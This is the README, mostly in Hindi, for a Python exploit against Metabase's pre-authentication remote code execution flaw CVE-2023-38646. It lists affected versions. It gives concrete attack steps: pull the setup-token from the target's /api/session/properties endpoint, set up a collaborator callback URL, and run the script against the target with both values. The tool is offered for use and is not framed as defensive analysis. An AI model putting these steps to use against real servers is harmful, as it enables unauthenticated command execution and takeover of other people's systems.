
Metabase प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन (CVE-2023-38646) के लिए Python एक्सप्लॉइट, जिसमें setup-टोकन निष्कर्षण और बिना प्रमाणीकरण के सर्वर से समझौते के लिए collaborator कॉलबैक शामिल है।
Metabase एक ओपन सोर्स बिजनेस इंटेलिजेंस टूल है जो आपको विभिन्न डेटाबेस और डेटा स्रोतों से डेटा का उपयोग करके चार्ट और डैशबोर्ड बनाने की सुविधा देता है। यह एक लोकप्रिय प्रोजेक्ट है, जिसके GitHub पर 33k से अधिक स्टार हैं और पिछले कुछ वर्षों में कमजोरी अनुसंधान के दृष्टिकोण से इसकी काफी जांच की गई है।
Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले के संस्करण हमलावरों को सर्वर पर, सर्वर के विशेषाधिकार स्तर पर, मनमानी कमांड निष्पादित करने की अनुमति देते हैं। शोषण के लिए प्रमाणीकरण की आवश्यकता नहीं है। अन्य फिक्स किए गए संस्करण 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, और 1.43.7.2 हैं।
* go to : http://target.com/api/session/properties
* copy : setup-token
* get collaborator url
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>

Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2